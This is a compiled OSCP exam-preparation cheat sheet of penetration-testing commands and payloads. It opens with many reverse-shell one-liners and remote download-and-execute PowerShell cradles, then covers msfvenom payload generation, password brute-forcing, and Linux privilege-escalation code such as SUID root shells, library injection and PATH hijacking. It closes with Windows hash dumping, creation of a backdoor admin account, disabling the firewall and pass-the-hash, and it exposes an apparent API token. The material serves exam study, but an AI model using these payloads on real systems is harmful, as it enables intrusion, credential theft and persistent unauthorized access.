OSCP preparation cheat sheets



A collection of publicly available cheat sheets for OSCP preparation.










Reverse Shells

Reference – Refererd from vaiours online sources PayloadAllTheThings


JSP / tomcat WAR 
msfvenom -p java/shell_reverse_tcp LHOST= LPORT=4444 -f war > java4444.war  
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4448 -f raw > w4448.jsp 

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f asp > shell.asp
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > shell.aspx

<?php $cmd = shell_exec('bash -i >& /dev/tcp/ 0>&1'); echo $cmd;?> 
<?php $cmd = shell_exec('cmd /c \\\test\nc.exe -e cmd.exe 4444'); echo $cmd;?> 


/usr/share/webshells/php/simple-backdoor.php , paramter - cmd 

Cold FUsion 






bash -i >& /dev/tcp/ 0>&1  

mknod backpipe p && nc 4445 0<backpipe | /bin/bash 1>backpipe 

mkfifo /tmp/f2;cat /tmp/f2|/bin/sh -i |nc 4444 >/tmp/f2 

nc -e /bin/bash 4444


php -r '$sock=fsockopen("",4446);exec("/bin/sh -i <&3 >&3 2>&3");' 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

perl -e 'use Socket;$i="";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p



\\\test\nc.exe -e cmd.exe 4444

certutil -urlcache -f nc.exe & nc.exe -e cmd.exe 4444

start /B \\\test\nc.exe -e cmd.exe 4444 

start /B powershell.exe -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

start /B powershell -exec bypass -c "$sm=(New-Object Net.Sockets.TCPClient('',4444)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}"

powershell -exec bypass -c "iwr('')|iex"

powershell -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('')"

NOT Tested 
powershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip='192.168.xxx.xxx';$port=xxxx;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}" 

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.XXX.XXX/powercat.ps1');powercat -c 192.168.XXX.XXX -p 443 -e cmd"


certutil -urlcache -f shell.exe & shell.exe 


rundll32.exe \\\vabFG\test.dll,0 

regsvr32 /s /n /u /i: scrobj.dll 

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString(''))" 

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 -f msi > 1.msi 
msiexec /q /i 



msfconsole -x "use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set lhost tun0; set lport 4445; run -j" 


msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf  
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf   
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 

Unstaged size restricted 
msfvenom -p windows/exec CMD=calc.exe -b "x00" -f py

File Transfer



Python –c pyftpdlib –p 21 –write


sudo python3 -m http.server 80 
sudo python -m SimpleHTTPServer 80 


sudo impacket-smbserver <sharename> <share path>


From Windows

FTP Upload / Download

echo "open <IP> ">ftp.txt
echo "user">>ftp.txt
echo "pass">>ftp.txt
echo "bin">>ftp.txt
echo "get file.exe">>ftp.txt
echo "put file.exe">>ftp.txt
echo "bye">>ftp.txt

ftp -s ftp.txt

HTTP Download

certutil -urlcache -f shell.exe 
bitsadmin /transfer n http://domain/file c:%homepath%file

$p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file" "C:%homepath%file")
PS C:> .test.ps1

SMB Upload / Download

copy \\IP-address\share\x x 
net view \\<ip>
net use x: \ /user:example.comuserID myPassword

Initial Enumeration


NMAP TCP quick

> sudo nmap -Pn -v -sS -sV -sC -oN tcp-quick.nmap IP


> sudo nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN tcp-full.nmap -sV IP 

NMAP TCP – Repeat if extra ports found

> sudo nmap -Pn -v -sS -A -oN tcp-extra.nmap -p PORTS IP 

NMAP UDP quick

> sudo nmap -Pn -v -sU -sV --top-ports=30 -oN udp-quick.nmap IP


> sudo nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T4 -oN udp-1000.nmap IP

NMAP UDP – Repeat if extra ports found

> sudo nmap -Pn -sU -A -oN udp-extra.nmap -p PORTS IP 


FTP – Port 21

Check for FTP version vulns
Check for Anonymous login 
Check for Read access
Check for Web root or root directories of any other accessible service 
Check for write access

SSH – Port 22

Check for SSH version vulns
Check for User enumeration if necessary 
Check if host key was seen somewhere else 
Check if it prompts for a password - means password login is allowed for some users
nmap -sV --script=ssh-hostkey -p22 IP
Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar, MSF (if port gets filtered, there's defense mechanisms - fail2ban) 

Telnet – Port 23

Connect and check for service running

SMTP – Port 25

Check for SMTP vulns Check version with HELO / HELLO

POP – PORT 110

Connect using telnet 
user <username> 
pass <pass> 
LIST - to list emails 
RETR <email numbr> - To retrieve emails 

DNS – Port 53

Might indicate a domain controller on Windows 
Check for zone transfer - 

Kerberos – Port 88

Indication that its a DC

Netbios – Port 139

> nmblookup -A IP
> nbtscan IP 
> On older hosts, this port servers SMB / SAMBA, scan by adding 'client min protocol = LANMAN1' to GLOBAL setting in /etc/samba/smb.conf or by using --option='client min protocol'=LANMAN1 with smbclient

RPC – PORT 135

> sudo nmap -sS -Pn -sV --script=rpcinfo.nse -p135 0 
> rpcinfo IP
> rpcclient -U "" -N [ip]

LDAP – Ports 389,636,3268,326

> sudo nmap -sS -Pn -sV --script=ldap* -p389,636,3268,3269  

WEB – PORT 80 / 443


> sudo nmap -Pn -sC -p80,443


Browse the webapp 
Check for usernames, keywords 
Check Web server vulns
Check for Cgi's shellshock
Check Certificates for hostname
Check robots.txt
Check sitemap.xml
Check for known software - View source 
Check for default credentials 
Check for input validation - SQLi
Check for OS Command execution
Check for LFI / RFI 


> dirb IP
> dirb with -X extensions based on web technology, .php,.asp,.txt,.jsp
> dirb IP -a  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'


> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt
> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -k -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'


> nikto -host IP

SMB – Ports

NMAP vuln scripts

> sudo nmap -Pn --script=smb-proto* -p139,445 
> sudo nmap -Pn --script=smb-os-discovery.nse -p139,445
> sudo nmap -Pn --script=smb-enum* -p139,445
> sudo nmap -Pn --script=smb-vuln* -p139,445
> nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 

Check for Null logins

> nmap --script smb-enum-shares -p 139,445 
> smbclient -L \\\\ip\\ -N 
> smbclient -m=SMB2 -L \\\\Hostname\\ -N

Connect to a share with Null session

> smbclient \\\\IP\\$Admin -N 
> smbmap -H IP
> smbmap -u DoesNotExists -H IP
> enum4linux -a IP

Check permissions on a connect share

> smb: \> showacls # enable acl listing
> smb: \> dir # list directories with acls

Mount share on local machine

> sudo mount -t cifs // ~/path/to/mount_directory

List share with credentials


Recursively list all files in share

> smbmap -R -H <TARGET-IP>
> smbmap -R Replication -H <TARGET-IP>

With smbclient (recurse downloads all files)

> smbclient //<TARGET-IP>/Replication
> smb: \> recurse ON
> smb: \> prompt OFF
> smb: \> mget *

Upload / Download specific files

> smbmap -H <TARGET-IP> --download 'Replication\active.htb\ 
> smbmap -H <TARGET-IP> --upload test.txt SHARENAME/test.txt 

NFS – Port 2049

> showmount -e IP 
> mount -t nfs -o vers=3 ~/home
> mount -t nfs4 -o proto=tcp,port=2049 mountpoint


> tftp client to connect
> atftp is a better client 
> Can be used to read system files, MSSQL password mdf file

Finding exploits

Search on EDB and searchsploit
Check each service on CVE details for RCE / LFI / RFI / SQLI issues 
Google search the with the service banner 

Linux Command Stash

SSH Tunneling 101

# SSH local port forward to reach  an_internal_server_ip:port via server_ip
ssh tunneler@server_ip -p 2222 -L 1234:an_internal_server_ip:80 
# Now curl localhost:1234 will fetch an_internal_server_ip:80 which is reachable from server_ip only

# dynamic port forward to create a SOCKS proxy to visit any_internal_server_ip
ssh tunneler@server_ip -p 2222 -D 1080 
# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from server_ip only

# ProxyJump ssh to an_internal_host via ssh server_ip
ssh -J tunneler@server_ip:2222 whistler@an_internal_host # which is only accessible from server_ip

# SSH remote port forward to send traffic back to our local port from a port of server_ip
ssh whistler@server_ip -p 2222 -L 58671:localhost:1234 # 
# this will listen on port 58671 of server_ip and tunnel the traffic back to us on loclahost:1234; nc -nlvp 1234 to receive for example

# Chain ProxyJump + dynamic port forward to create a proxy of 2nd_box which is only accessible via 1st_box
ssh -j firstuser@1st_box:2222 seconduser@2nd_box -D 1080
# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from 2nd_box only

# bypass first time prompt when have non-interactive shell

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" ...

SSH reverse tunneling

ssh -f -N -R 8000: -R 4443: -R 33306: -R 33389:  -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i key kali@

# kill with
ps -C ssh
kill -9 <pid>

create self-signed ssl certificate

openssl req -newkey rsa:2048 -nodes -keyout my_cert.key -x509 -days 36
2 -out my_cert.crt

# convert to .pem if needed:
openssl pkcs12 -export -in my_cert.crt -inkey my_cert.key -out my_cert.p12
openssl pkcs12 -in my_cert.p12 -nodes -out my_cert.pem


searchsploit -www query # show exploitdb link instead
searchsploit -x /path/to/exploit # read the exploit file
searchsploit -m /path/to/exploit # mirror exploit file to current directory

hydra web form bruteforce

hydra -l admin -P ~/git/SecLists/Passwords/Leaked-Databases/rockyou-50.txt http-post-form "/blog/admin.php:username=^USER^&password=^PASS^:Incorrect username"

hydra -l admin -P ~/git/SecLists/Passwords/Common-Credentials/10k-most-common.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" -t 64 # 64 threads
# change to https-web-form for port 443

hydra ssh brute

hydra -l username -P wordlist.txt ssh <Target-IP> -s 22222

get glibc version

ldd --version

compile for 32 bit from a 64bit os, install gcc-multilib first

gcc -m32 -D_GNU_SOURCE -o suid32 suid.c

transfer files through netcat

# start listening for download
nc -nlvp 9001 > dump.txt
# start uploading from target box
nc ip port < file.txt

bruteforce zip file with fcrackzip

fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.zip 

bruteforce zip file with john

zip2john myfile.zip > johnkey
john johnkey --wordlist=/usr/share/wordlists/rockyou.txt

port knocking on 3 ports using nmap

for x in $(echo 22 23 24);do nmap -PN --host-timeout 201 --max-retries 0 -r -p$x;done

classic gobuster

gobuster dir -u -a 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3831.6 Safari/537.36' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -o gobuster/http-dlist-lower-small.txt

list contents of .vhd file

7z l filename.vhd

do a local port scan using SSRF

# --hl=2 is hide responses that has 2 lines. 
wfuzz -c --hl=2 -z range,1-65535

dump password hasshes from ntds dump file using system hive file and the dit file

impacket-secretsdump -ntds ntds.dit -system SYSTEM.bin LOCAL
# tip: users ending with $ are system accounts and has hard passwords, look for other ones

wpscan enum all plugins

wpscan --url --enumerate ap --plugins-detection aggressive --force --api-token o3Oj8OysJNmHbVf5PoEMe6ASLUrac3Q5KJB8G0aguz4

wpscan brute

wpscan --usernames tom -P /usr/share/wordlists/rockyou.txt --force --password-attack wp-login --url --no-update

generate client certificate from ca.key

openssl req -x509 -new -nodes -key ca.key -sha256 -days 1024 -out rh.pem
openssl pkcs12 -export -in rh.pem -inkey ca.key -out rh.p12

openssl reverse shell

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

generate passwd hash with openssl

openssl passwd -1 -salt rh0x01 password123

check ASREPRoast for all domain users (without credentials)

for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip htb/${user} | grep -v Impacket; done

john crack krb5asrep hash

john --format:krb5asrep alfresco.kerb --wordlist=/usr/share/wordlists/rockyou.txt

generate password wordlist with crunch

crunch 13 13 -t bev,%%@@^1995 -o wordlist.txt
# 13 13 - min max length
# bev - start's with
# @ will insert lower case characters
# , will insert upper case characters
# % will insert numbers
# ^ will insert symbols

mount nfs share

mount -t nfs -o vers=3 ~/home

mount -t nfs4 -o proto=tcp,port=2049 mountpoint

mount smb share

sudo mount -t cifs //'sharename' /home -o rw,vers=1.0,dir_mode=0777,file_mode=0777,nounix
# or
sudo mount -t cifs -o vers=1.0 //'Sharename' sharemount

login to windows machine in the network with proxychains

xfreerdp /u:admin /v:ip_address +clipboard



Linux Exploits


  • DirtyCOW AddUser (Ubuntu <4.4/<3.13; Debian <4.7.8)
  • DirtyCOW Pokeball (Linux Kernel 2.6.22 < 3.9)
  • Mempodipper (Linux 2.6.39<3.2.2 Gentoo/Debian)
  • Full Nelson (Linux 2.6.31<2.6.37 RedHat/Debiab)
  • Half Nelson (Linux Kernel 2.6.0<
  • Clown NewUser (Linux 3.0<3.3.5)
  • fasync_helper (Linux Kernel <2.6.28)
  • overlayfs (Linux 3.13.0<3.19)
  • pipe.c root(kit?) (Kernel 2.6.x (32 Bit only!))
  • PERF_EVENTS (Kernel 2.6.32-3.8.10)
  • CAN BCM Exploit (Kernel <2.6.36)
  • Cups local Exploit (Cups <1.1.17)


Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
> gcc -o root 9542.c -m32 -Wl,--hash-style=both

Linux Privesc

Linux privilege escalation

Spawn Interactive Shell and set env

python -c 'import pty;pty.spawn("/bin/bash");'  
ctrl z  
echo $TERM  
stty -a  
stty raw -echo  

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH  
export TERM=xterm256-color  
export SHELL=bash  

stty rows \<> colums \<>

Restricted bash

perl -e 'exec "/bin/sh";'  
/bin/sh -i  
exec "/bin/sh";  
echo os.system('/bin/bash')  
/bin/sh -i  
ssh user@$ip nc $localip 4444 -e /bin/sh  
export TERM=linux 

Automated scripts

Mestaploit: multi/recon/local_exploit_suggester

Check environment

Check OS and Kernel

cat /etc/issue
cat /etc/*-release
  cat /etc/lsb-release      # Debian based
  cat /etc/redhat-release   # Redhat base

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

Check environment variables

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

# Is there a printer 
lpstat -a

Check any restricitions on any folders

mount -l        >> any no exec or no suid?  

Check any unmounted drives  
cat /etc/fstab 

Applications and services

Running application / services

ps aux
ps -ef
cat /etc/services

ps aux | grep root
ps -ef | grep root

Installed applications – Check for vulnerable versions

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
pspy4 - to capture change in processes 

Application config files

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

Jobs / CRONS

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
ls -al /var/cron.log - check timestamps 

# If cron entries have relative paths, and If path is editable by user, cron entries can be hijacked by adding custom path to PATH variable
export PATH=/tmp:$PATH

# If Cron entris have wildcards, eg. tar with a (*)wildcard can be hijacked by using below on the folder 
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh

# Check permissions on cron binaries , overwrite possible? 

# Check for frequent CRONS running in bg 
# You can monitor the processes to search for processes that are being executed every 1,2 or 5 minutes. Maybe you can take advantage of it and escalate privileges. 
# For example, to monitor every 0.1s during 1 minute, sort by less executed commands and deleting the commands that have beeing executed all the time, you can do:
for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
# https://github.com/DominicBreuker/pspy 

SystemD timers
systemctl list-timers -all
# watch for recently executed timers


Network details

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
ip a 
ip addr

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L

Existing connections

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on

## Cached IPs 
arp -e
/sbin/route -nee

tcpdump tcp dst 80 and tcp dst 21

USER and sensitive info

cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

## Check for Sensitive info 
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
ls -ahlR /root/
ls -ahlR /home/

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


cat /etc/fstab
cat /etc/exports
df -h
# Check for NFS no root squash on exports, can be escalated by mounting on local system and writing an suid binary as root, root privs are not squashed 
showmount -e MACHINE_IP
mkdir /tmp/1
mount -o rw,vers=2 MACHINE_IP:/tmp /tmp/1
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x

Which configuration files can be written in /etc/? Able to reconfigure a service?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null       # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null        # Other

find /etc/ -readable -type f 2>/dev/null               # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

VAR contents 
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Check Application logs for sensitive data 
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Find SUID Files

find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.  
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.  
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.  

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID < full search  
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin < quicker  

-find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null  

find / perm /u=s -user "User name that you are looking for" 2>/dev/null

Writable file and nobody files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files  
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

Writable by current user

find / perm /u=w -user `whoami` 2>/dev/null  
find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null  
find / -perm /u+w -user `whoami` 2>/dev/null

Any script files that we can modify?

find / -writable -type f -name "*.py" 2>/dev/null     #find all python file that can be write by us  

ls -aRl / | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone  
ls -aRl / | awk '$1 ~ /^..w/' 2>/dev/null       # Owner  
ls -aRl / | awk '$1 ~ /^.....w/' 2>/dev/null    # Group  
ls -aRl / | awk '$1 ~ /w.$/' 2>/dev/null        # Other  

find / -readable -type f 2>/dev/null               # Anyone  
find / -readable -type f -maxdepth 1 2>/dev/null   # Anyone 

Any service running by root?

ps aux|grep "root"  

/usr/bin/journalctl (Which is normally not readable by a user) << cron job?

Find password

grep -rnw '/' -ie 'pass' --color=always  
grep -rnw '/' -ie 'DB_PASS' --color=always  
grep -rnw '/' -ie 'DB_PASSWORD' --color=always  
grep -rnw '/' -ie 'DB_USER' --color=always 

Interesting files

Files modified in the last 5 mins
find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null

Sqlite DB files
find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null

All hidden files 
find / -type f -iname ".*" -ls 2>/dev/null

Scrtips in PATH 
for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
for d in `echo $PATH | tr ":" "\n"`; do find $d -type -f -executable 2>/dev/null; done

Backup files 
find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/nulll

Exploitation techniques


find / -perm -4000 -type f -exec ls -la {} 2>/dev/null
Check GTFOBins

Is suid bit set on these applications?

    nmap -V     <Nmap version 2.02 - 5.21 had an interactive mode  
    nmap --interactive  
    nmap> !sh  
    Modify system file, e.g. passwd?  
    - Press ESC key  
    :set shell=/bin/sh  
    touch pentestlab  
    find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;  
    bash -p      
    less /etc/passwd  

    Can you modify system file?  
    Modify /etc/suoders  
    \<user> ALL=(ALL) NOPASSWD:ALL  
    Use cp to overwrite passwd with a new password  

Is there a custom SUID / SUDO application?

How can this application be run?
Can be modify the path variable so that it will execute something else

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \

Operation of this application 
#Look for scripts, operation, relative paths, permissions 
strings customapp 

#Loading shared libararies – use strace to trace a suid file and check for non existent lib files. Compile a lib file in C and put it in the missing location 
strace /usr/local/bin/customapp 2>&1 | grep -i -E "open|access|no such file"
strace /usr/local/bin/customapp 
------Below can be used to compile----
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
gcc -shared -o /home/user/missing.so -fPIC /home/user/missing.c

#Check for SUID binarys/applications vulnerable to symlink attacks
> check for nginxroot vulnerability 

#PATH hijacking 
strings /usr/local/bin/suid-env
## if relative path is used 
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH

## If full service path is specified in the SUID binary, we can still create bash function adn export it to services
function /usr/sbin/serviceX() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/serviceX

## Second method 
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

NFS priv esc


Linux capability

find / -type f -print0 2>/dev/null | xargs -0 getcap 2>/dev/null
getcap -r /
getcap -r / 2>/dev/null
# If we find cap_dac_read_search # read anything 
# cap_setuid+ep # setuid 
google that capability on how it can help us get root

Mysql run by root

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library

You can also try
select sys_exec('echo test>/tmp/test.txt');
select sys_eval('echo test>/tmp/test.txt');

Docker group

docker run -it --volume /:/mnt alpine:latest chroot /mnt

Overwite etc/passwd inside docker to gain root

SSH bad keys attack

If Authorized_keys is readable, check for the public key content in debian-ssh github for private keys - refer Payload all the things



Windows Command Stash

Dump hashes

reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security

secretsdump.py -sam sam -system system -security security LOCAL > hashes.txt

Add RDP user

net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD

Turn off firewall

NetSh Advfirewall set allprofiles state off

Pass the hash

pth-winexe -U JEEVES/administrator%aad3b43XXXXXXXX35b51404ee:e0fb1fb857XXXXXXXX238cb
